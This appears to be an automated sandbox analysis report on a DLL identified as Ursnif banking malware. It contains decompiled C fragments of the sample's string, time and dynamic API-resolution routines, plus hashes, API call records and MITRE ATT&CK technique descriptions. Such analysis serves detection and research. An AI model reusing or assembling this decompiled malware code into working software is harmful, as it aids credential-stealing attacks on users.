Uniqueness Score: -1.00%

Function 00D93695, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00D93695(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				short _t19;
				void* _t23;
				void* _t25;
				short* _t26;

				_t25 = E00D9A5A3(0, _a12);
				if(_t25 == 0) {
					_t23 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0;
					_t23 = E00D948E2(__ecx, _a4, _a8, _t25);
					if(_t23 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_push( &_v12);
						_t23 = E00D93D94(8, _a4, 0x80000001, _a8, _t25);
					}
					HeapFree( *0xd9d238, 0, _t25);
				}
				return _t23;
			}

0x00d936a8
0x00d936ac
0x00d93708
0x00d936ae
0x00d936b5
0x00d936bd
0x00d936c5
0x00d936c9
0x00d936cf
0x00d936d7
0x00d936d8
0x00d936de
0x00d936f3
0x00d936f3
0x00d936fe
0x00d936fe
0x00d9370f

APIs

Part of subcall function 00D9A5A3: lstrlen.KERNEL32(?,00000000,00D9D330,00000001,00D9453C,00D9D00C,00D9D00C,00000000,00000005,00000000,00000000,?,?,?,00D9857A,?), ref: 00D9A5AC
Part of subcall function 00D9A5A3: mbstowcs.NTDLL ref: 00D9A5D3
Part of subcall function 00D9A5A3: memset.NTDLL ref: 00D9A5E5

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,04BD934C), ref: 00D936CF
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,04BD934C), ref: 00D936FE

Strings

Uxt, xrefs: 00D936FE

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID: Uxt
API String ID: 1500278894-1536154274
Opcode ID: f188d16ceb7a4ccab2d2264984760566d2ec028f6a5b1cd063b3bb4e01803d9c
Instruction ID: 2b6f14d5e0ed31011522f9656128761709ef366e5aa69e20fa16f53af351f579
Opcode Fuzzy Hash: f188d16ceb7a4ccab2d2264984760566d2ec028f6a5b1cd063b3bb4e01803d9c
Instruction Fuzzy Hash: D601DF36210209BBDF216FA8DC49F9B7BB9FF88714F100426FA04DA161EA71DA54C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 00D96BF1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00D96BF1(void* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t9;
				signed int _t11;
				intOrPtr _t12;
				struct HINSTANCE__* _t14;
				intOrPtr _t17;
				intOrPtr _t20;

				_t9 =  *0xd9d27c;
				_v8 = _v8 & 0x00000000;
				_t20 =  *0xd9d254; // 0x300
				if(_t9 != 0) {
					L2:
					if(_t20 != 0) {
						_t11 =  *_t9(_t20,  &_v8);
						if(_t11 == 0) {
							_v8 = _v8 & _t11;
						}
					}
					L5:
					return _v8;
				}
				_t12 =  *0xd9d2a4; // 0x3e3a5a8
				_t3 = _t12 + 0xd9e0af; // 0x4e52454b
				_t14 = GetModuleHandleA(_t3);
				_t17 =  *0xd9d2a4; // 0x3e3a5a8
				_t4 = _t17 + 0xd9e9e4; // 0x6f577349
				 *0xd9d274 = _t14;
				_t9 = GetProcAddress(_t14, _t4);
				 *0xd9d27c = _t9;
				if(_t9 == 0) {
					goto L5;
				}
				goto L2;
			}

0x00d96bf5
0x00d96bfa
0x00d96bff
0x00d96c07
0x00d96c3d
0x00d96c3f
0x00d96c46
0x00d96c4a
0x00d96c4c
0x00d96c4c
0x00d96c4a
0x00d96c4f
0x00d96c54
0x00d96c54
0x00d96c09
0x00d96c0e
0x00d96c15
0x00d96c1b
0x00d96c21
0x00d96c29
0x00d96c2e
0x00d96c34
0x00d96c3b
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(4E52454B,-00000008,?,?,00D956E1,?,00000001,?), ref: 00D96C15
GetProcAddress.KERNEL32(00000000,6F577349), ref: 00D96C2E

Strings

Nxt, xrefs: 00D96C2E

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: Nxt
API String ID: 1646373207-3788892007
Opcode ID: db783cb39bcc869525b43a2c0608f2513894e19d4996ca51a1d915acd5e45725
Instruction ID: 85235fda1d8eb01817977085f685e94b5be4bb9c1064a5d07a53e1e64d34571a
Opcode Fuzzy Hash: db783cb39bcc869525b43a2c0608f2513894e19d4996ca51a1d915acd5e45725
Instruction Fuzzy Hash: 01F049B1A11306EFCF14DFA5EE19AAA37ADEB48704B04005AA818D7350E730EA05CB74

Uniqueness

Uniqueness Score: -1.00%

Function 00D94F14, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00D94F14(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00D96D10(_t2);
				if(_t34 != 0) {
					_t30 = E00D96D10(_t28);
					if(_t30 == 0) {
						E00D945B3(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00D9A6E0(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00D9A6E0(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x00d94f14
0x00d94f1e
0x00d94f20
0x00d94f26
0x00d94f26
0x00d94f2f
0x00d94f33
0x00d94f3f
0x00d94f43
0x00d94fb7
0x00d94f45
0x00d94f45
0x00d94f49
0x00d94f4e
0x00d94f53
0x00d94f6d
0x00d94f5c
0x00d94f5c
0x00d94f60
0x00d94f63
0x00d94f68
0x00d94f68
0x00d94f72
0x00d94f9a
0x00d94fa0
0x00d94fa3
0x00d94f74
0x00d94f76
0x00d94f7e
0x00d94f89
0x00d94f8e
0x00d94f8e
0x00d94faa
0x00d94fb1
0x00d94fb2
0x00d94fb2
0x00d94f43
0x00d94fc2

APIs

lstrlen.KERNEL32(00000000,00000008,?,74784D40,?,?,00D93F7D,?,?,?,?,00000102,00D9519D,?,?,747C81D0), ref: 00D94F20

Part of subcall function 00D96D10: RtlAllocateHeap.NTDLL(00000000,-00000008,00D95D29), ref: 00D96D1C

Part of subcall function 00D9A6E0: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00D94F4E,00000000,00000001,00000001,?,?,00D93F7D,?,?,?,?,00000102), ref: 00D9A6EE
Part of subcall function 00D9A6E0: StrChrA.SHLWAPI(?,0000003F,?,?,00D93F7D,?,?,?,?,00000102,00D9519D,?,?,747C81D0,00000000), ref: 00D9A6F8

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00D93F7D,?,?,?,?,00000102,00D9519D,?), ref: 00D94F7E
lstrcpy.KERNEL32(00000000,00000000), ref: 00D94F8E
lstrcpy.KERNEL32(00000000,00000000), ref: 00D94F9A

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 499b81167e3ad5f57eb6edfeb44dbc3ee5db25118cf2c9a922851b7d5369b009
Instruction ID: 190b3f97be7b67edb7b4abc1e5758efb9d646c0e2bf48264805eddae4b8e3c12
Opcode Fuzzy Hash: 499b81167e3ad5f57eb6edfeb44dbc3ee5db25118cf2c9a922851b7d5369b009
Instruction Fuzzy Hash: 8E215E72504256EBCF126FA8C844EAB7FE8DF46390B194055F9089B212EB75CD0187F1

Uniqueness

Uniqueness Score: -1.00%

Function 00D9241A, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D9241A(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00D96D10(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x00d9242f
0x00d92433
0x00d9243d
0x00d92442
0x00d92447
0x00d92449
0x00d92451
0x00d92456
0x00d92464
0x00d92469
0x00d92473

APIs

lstrlenW.KERNEL32(004F0053,?,74785520,00000008,04BD934C,?,00D96AFE,004F0053,04BD934C,?,?,?,?,?,?,00D961D1), ref: 00D9242A
lstrlenW.KERNEL32(00D96AFE,?,00D96AFE,004F0053,04BD934C,?,?,?,?,?,?,00D961D1), ref: 00D92431

Part of subcall function 00D96D10: RtlAllocateHeap.NTDLL(00000000,-00000008,00D95D29), ref: 00D96D1C

memcpy.NTDLL(00000000,004F0053,747869A0,?,?,00D96AFE,004F0053,04BD934C,?,?,?,?,?,?,00D961D1), ref: 00D92451
memcpy.NTDLL(747869A0,00D96AFE,00000002,00000000,004F0053,747869A0,?,?,00D96AFE,004F0053,04BD934C), ref: 00D92464

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 5750861bf89246dfa4460d2030aead327cb133020c473408a6ab321befba13fb
Instruction ID: e49f0d438db895cd9981604ed5d22c17646899fcd2a40812a37dc8b8a9664e2a
Opcode Fuzzy Hash: 5750861bf89246dfa4460d2030aead327cb133020c473408a6ab321befba13fb
Instruction Fuzzy Hash: E5F03232900118BB8F11AFA9CC89C9F7BACEF093947154062B908D7202EA75EA108BF0

Uniqueness

Uniqueness Score: -1.00%

Function 00D95FD1, Relevance: 5.0, APIs: 4, Instructions: 24stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00D98932,00000000,00000000,00D98932,616D692F,00000000), ref: 00D95FDD
lstrlen.KERNEL32(?), ref: 00D95FE5

Part of subcall function 00D96D10: RtlAllocateHeap.NTDLL(00000000,-00000008,00D95D29), ref: 00D96D1C

lstrcpy.KERNEL32(00000000,?), ref: 00D95FFC
lstrcat.KERNEL32(00000000,?), ref: 00D96007

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 990b6875203e3d9ff0439229b4a8863e2f6ebd4347e09df26903651d6b9cd39c
Instruction ID: b245f5b58a2d89728e22b7d67d8857f4d9c338cd47d55a3a81df18a03e0b19b1
Opcode Fuzzy Hash: 990b6875203e3d9ff0439229b4a8863e2f6ebd4347e09df26903651d6b9cd39c
Instruction Fuzzy Hash: FDE01233515721AB8B126FA4AC08C4FBBA9FF89350B054916F654D3220CB31C815CBF1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report c0nnect1on.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Function 00D9523B, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 222
memoryfiletimeCOMMON

Function 00511006, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81
filetimeCOMMON

Function 00D965CE, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103
memoryCOMMON

Function 00D96066, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 00511E57, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 005111EA, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 00D91000, Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 212
memorystringCOMMON

Function 00511F17, Relevance: 22.6, APIs: 15, Instructions: 112
threadsleepsynchronizationCOMMON

Function 00D96130, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 152
timememoryCOMMON

Function 00511815, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74
memorythreadCOMMON

Function 00D98492, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Function 00D94800, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Function 00511C1F, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 00D9A5F5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59
COMMON

Function 00D91E95, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Function 00D96A7F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94
memoryCOMMON

Function 00D95B7A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77
memoryCOMMON

Function 00D96810, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 157
stringCOMMON

Function 00511B04, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95
memoryCOMMON

Function 00D938B1, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Function 00D9567B, Relevance: 6.0, APIs: 4, Instructions: 38
sleepmemorythreadCOMMON

Function 00511338, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Function 00511280, Relevance: 4.6, APIs: 3, Instructions: 62
stringthreadCOMMON

Function 00D937B4, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Function 00D94509, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 57
memoryCOMMON

Function 00D946B8, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 42
memoryCOMMON

Function 00D959CA, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 005117EF, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Function 00D96D10, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Function 00511151, Relevance: 1.3, APIs: 1, Instructions: 66
COMMON

Function 00D93B9B, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Function 00D98779, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Function 00D95946, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON